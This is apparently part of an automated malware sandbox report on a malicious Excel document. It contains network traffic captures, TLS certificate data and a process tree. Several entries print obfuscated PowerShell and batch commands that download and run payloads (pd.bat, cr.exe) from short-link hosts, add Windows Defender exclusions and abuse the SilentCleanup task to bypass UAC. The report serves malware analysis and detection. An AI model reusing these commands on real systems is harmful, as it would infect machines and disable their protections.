57 69 6e 64 6f 77 73 5c 44 69 73 6b 43 6c 65 61 6e 75 70 5c 53 69 6c 65 6e 74 43 6c 65 61 6e 75 70 20 2f 49 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 33 20 3e 6e 75 6c 0d 0a 72 65 67 20 64 65 6c 65 74 65 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 
22 20 2f 46 0d 0a 29 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 36 2e 33 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 38 2e 31 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 74 65 6d 70 22 20 3b 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 61 70 70 64 61 74 61 22 20 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 31 32 3b 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 73 3a 2f 2f 63 75 74 74 2e 6c 79 2f 30 6a 73 62 55 44 54 27 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 63 72 2e 65 78 65 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73
                                                        Data Ascii: mode 18,1color FEsetlocalfor /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%jif "%version%" == "10.0" ( echo "Windows 10 detected" reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;&REM " >nultimeout /t 2 >nulschtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nultimeout /t 3 >nulreg delete "HKCU\Environment" /v "windir" /F)if "%version%" == "6.3" ( echo "Windows 8.1 detected" reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Proces


Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
1  192.168.2.22  49169  192.185.194.191  80  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp  kBytes transferred  Direction  Data
Jan 8, 2021 09:06:19.652738094 CET  81  OUT  GET /vantuz_2021.exe HTTP/1.1
Host: chebo.discountmonumentcenter.com
Connection: Keep-Alive
Jan 8, 2021 09:06:19.814476967 CET  82  IN  HTTP/1.1 200 OK
                                                        Date: Fri, 08 Jan 2021 08:06:19 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, Keep-Alive
                                                        Last-Modified: Mon, 04 Jan 2021 21:24:49 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 565248
                                                        Keep-Alive: timeout=5, max=75
                                                        Content-Type: application/x-msdownload
                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b2 d5 65 2a f6 b4 0b 79 f6 b4 0b 79 f6 b4 0b 79 e8 e6 8f 79 ed b4 0b 79 e8 e6 9e 79 ee b4 0b 79 e8 e6 88 79 97 b4 0b 79 d1 72 70 79 fd b4 0b 79 f6 b4 0a 79 93 b4 0b 79 e8 e6 81 79 f7 b4 0b 79 e8 e6 9f 79 f7 b4 0b 79 e8 e6 9a 79 f7 b4 0b 79 52 69 63 68 f6 b4 0b 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 17 b8 18 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 30 08 00 00 80 00 00 00 c0 37 04 b0 36 3f 04 00 d0 37 04 00 00 40 04 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 40 04 00 10 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 71 40 04 60 01 00 00 00 00 40 04 04 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 38 3f 04 18 00 00 00 88 f6 3f 04 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 c0 37 04 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 30 08 00 00 d0 37 04 00 28 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 80 00 00 00 00 40 04 00 74 00 00 00 2c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 2e 39 35 00 55 50 58 21 0d 09 08 02 b9 07 27 2e f1 8f 7a 31 fc 18 3f 04 af 66 07 00 00 f2 16 00 24 69 00 8b f3 bc b6 f2 80 d9 06 00 94 d7 0e a8 06 bc d6 9e d7 3e cf ec fe 14 d8 2e 28 06 44 5e ef
                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$e*yyyyyyyyyrpyyyyyyyyyyRichyPEL^076?7@@@q@`@qT8??HUPX07UPX107(@.rsrc@t,@3.95UPX!'.z1?f$i>.(D^


                                                        HTTPS Packets

Timestamp:Jan 8, 2021 09:06:07.078320026 CET
Source IP:104.22.1.232
Source Port:443
Dest IP:192.168.2.22
Dest Port:49165
Subject:CN=www.cutt.ly
Issuer:CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US
Not Before:Sat Feb 08 01:00:00 CET 2020
Not After:Thu Apr 08 14:00:00 CEST 2021
Chain certificate Subject:CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US
Chain certificate Issuer:CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US
Chain certificate Not Before:Thu Nov 02 13:24:33 CET 2017
Chain certificate Not After:Tue Nov 02 13:24:33 CET 2027
JA3 SSL Client Fingerprint:769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
JA3 SSL Client Digest:05af1f5ca1b87cc9cc9b25185115607d

Timestamp:Jan 8, 2021 09:06:18.773220062 CET
Source IP:104.22.1.232
Source Port:443
Dest IP:192.168.2.22
Dest Port:49168
Subject:CN=www.cutt.ly
Issuer:CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US
Not Before:Sat Feb 08 01:00:00 CET 2020
Not After:Thu Apr 08 14:00:00 CEST 2021
Chain certificate Subject:CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US
Chain certificate Issuer:CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US
Chain certificate Not Before:Thu Nov 02 13:24:33 CET 2017
Chain certificate Not After:Tue Nov 02 13:24:33 CET 2027
JA3 SSL Client Fingerprint:769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
JA3 SSL Client Digest:05af1f5ca1b87cc9cc9b25185115607d

Timestamp:Jan 8, 2021 09:08:10.254141092 CET
Source IP:195.201.225.248
Source Port:443
Dest IP:192.168.2.22
Dest Port:49174
Subject:CN=telecut.in
Issuer:CN=R3, O=Let's Encrypt, C=US
Not Before:Sat Dec 19 08:52:17 CET 2020
Not After:Fri Mar 19 08:52:17 CET 2021
Chain certificate Subject:CN=R3, O=Let's Encrypt, C=US
Chain certificate Issuer:CN=DST Root CA X3, O=Digital Signature Trust Co.
Chain certificate Not Before:Wed Oct 07 21:21:40 CEST 2020
Chain certificate Not After:Wed Sep 29 21:21:40 CEST 2021
JA3 SSL Client Fingerprint:769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
JA3 SSL Client Digest:05af1f5ca1b87cc9cc9b25185115607d

Timestamp:Jan 8, 2021 09:08:12.033230066 CET
Source IP:104.18.58.219
Source Port:443
Dest IP:192.168.2.22
Dest Port:49176
Subject:CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US
Issuer:CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
Not Before:Wed Dec 23 01:00:00 CET 2020
Not After:Thu Dec 23 00:59:59 CET 2021
Chain certificate Subject:CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
Chain certificate Issuer:CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
Chain certificate Not Before:Mon Jan 27 13:48:08 CET 2020
Chain certificate Not After:Wed Jan 01 00:59:59 CET 2025
JA3 SSL Client Fingerprint:769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
JA3 SSL Client Digest:05af1f5ca1b87cc9cc9b25185115607d

Timestamp:Jan 8, 2021 09:08:26.568110943 CET
Source IP:104.18.58.219
Source Port:443
Dest IP:192.168.2.22
Dest Port:49177
Subject:CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US
Issuer:CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
Not Before:Wed Dec 23 01:00:00 CET 2020
Not After:Thu Dec 23 00:59:59 CET 2021
Chain certificate Subject:CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
Chain certificate Issuer:CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
Chain certificate Not Before:Mon Jan 27 13:48:08 CET 2020
Chain certificate Not After:Wed Jan 01 00:59:59 CET 2025
JA3 SSL Client Fingerprint:769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
JA3 SSL Client Digest:05af1f5ca1b87cc9cc9b25185115607d

                                                        Code Manipulations

                                                        Statistics

                                                        Behavior

                                                        System Behavior

                                                        General

                                                        Start time:09:05:53
                                                        Start date:08/01/2021
                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                        Imagebase:0x13f480000
                                                        File size:27641504 bytes
                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:09:05:56
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:05:56
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:05:58
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Start time:09:05:59
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Start time:09:05:59
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, Author: Florian Roth
                                                        Reputation:high

                                                        General

                                                        Start time:09:06:04
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\attrib.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\system32\attrib.exe' +s +h pd.bat
                                                        Imagebase:0xff680000
                                                        File size:18432 bytes
                                                        MD5 hash:C65C20C89A255517F11DD18B056CADB5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:06:10
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:06:11
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\mode.com
                                                        Wow64 process (32bit):false
                                                        Commandline:mode 18,1
                                                        Imagebase:0xffea0000
                                                        File size:30208 bytes
                                                        MD5 hash:718E86CB060170430D4EF70EE39F93D4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:06:11
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ver
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:09:06:12
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Start time:09:06:13
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        General

                                                        Start time:09:06:19
                                                        Start date:08/01/2021
                                                        Path:C:\Users\user\AppData\Roaming\cr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\AppData\Roaming\cr.exe'
                                                        Imagebase:0x400000
                                                        File size:565248 bytes
                                                        MD5 hash:740E559929463320CB8E0403FD35A097
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 72%, ReversingLabs

                                                        Disassembly

                                                        Code Analysis